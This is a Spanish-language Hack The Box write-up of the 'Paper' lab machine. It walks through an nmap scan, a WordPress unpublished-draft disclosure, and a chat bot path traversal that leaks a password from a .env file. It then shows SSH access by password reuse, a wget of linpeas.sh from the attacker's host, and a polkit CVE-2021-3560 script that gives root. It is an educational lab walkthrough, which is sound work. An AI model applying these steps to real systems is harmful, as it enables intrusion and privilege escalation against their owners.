Entrada

Paper

Publicado
Hack The Box
Hack The Box
Por Pablo Martínez Rivas
5 min de lectura
Paper

Paper Linuz · Easy - Adventure mode

🔭 Reconocimiento:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

└─$ nmap -p- -sSVC --min-rate 5000 10.129.136.31
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-08 11:30 +0100
Nmap scan report for 10.129.136.31
Host is up (0.046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_  Potentially risky methods: TRACE
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_  http/1.1
| http-methods:
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
HTTP/1.1 403 Forbidden
Date: Sun, 08 Feb 2026 10:56:13 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

paper_web

Capturando con Zap proxy se descubre un subdominio office.paper en la respuesta.

paper_wordpress

Wappalizer nos indica que es una versión de Wordpress antigua 5.2.3.

💣 Preparación:

https://www.exploit-db.com/exploits/47690

👽 Acciones:

El exploit es muy simple, introducimos ?static=1 tal y como nos sugiere el exploit y conseguimos ver información relevante

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

Esto nos lleva a incluir en nuestro /etc/host/ el dominio chat.office.paper y luego visitamos http://chat.office.paper/register/8qozr226AhkCHZdyY

paper_chat_general

Al parecer en este chat existe un bot el cual podemos enviarle comandos, por lo que parece que tenemos que jugar con el.

paper_chat_bot_list

Pues sigo jugando con el bot

web_bot_traversal_path

Y se puede ver que podemos acceder a archivos del usuario dwight.

paper_chat_bot_env

Finalmente encuentro un fichero hubot/.env con información como una password Queenofblad3s!23

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

└─$ ssh dwight@10.129.136.31
The authenticity of host '10.129.136.31 (10.129.136.31)' can't be established.
ED25519 key fingerprint is: SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.136.31' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
dwight@10.129.136.31's password:
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ cat user.txt
461cc6744c4d4410************
[dwight@paper ~]$ wget http://10.10.15.67/linpeas.sh
--2026-02-08 13:45:56--  http://10.10.15.67/linpeas.sh
Connecting to 10.10.15.67:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 975444 (953K) [application/x-sh]
Saving to: ‘linpeas.sh’
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
Vulnerable to CVE-2021-3560

Hacemos reuso de la password para entrar con el usuario dwight Linpeas.sh indica que existe un CVE sobre el binario polkit

CVE: CVE-2021-3560

💣 Preparación:

https://github.com/tufanturhan/Polkit-Linux-Priv

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

[dwight@paper ~]$ /usr/bin/python3 cve.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
[+] Timed out at: 0.007819500594330517
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

bash: cannot set terminal process group (54398): Inappropriate ioctl for device
bash: no job control in this shell
[root@paper dwight]# cat /root/root.txt 
4fa0d42cb3c75c0fd************

Como es un script en Python, basta con copiar el contenido y pegarlo en el editor nano.

achivement

writeup, hackthebox
hackthebox paper
Esta entrada está licenciada bajo CC BY 4.0 por el autor.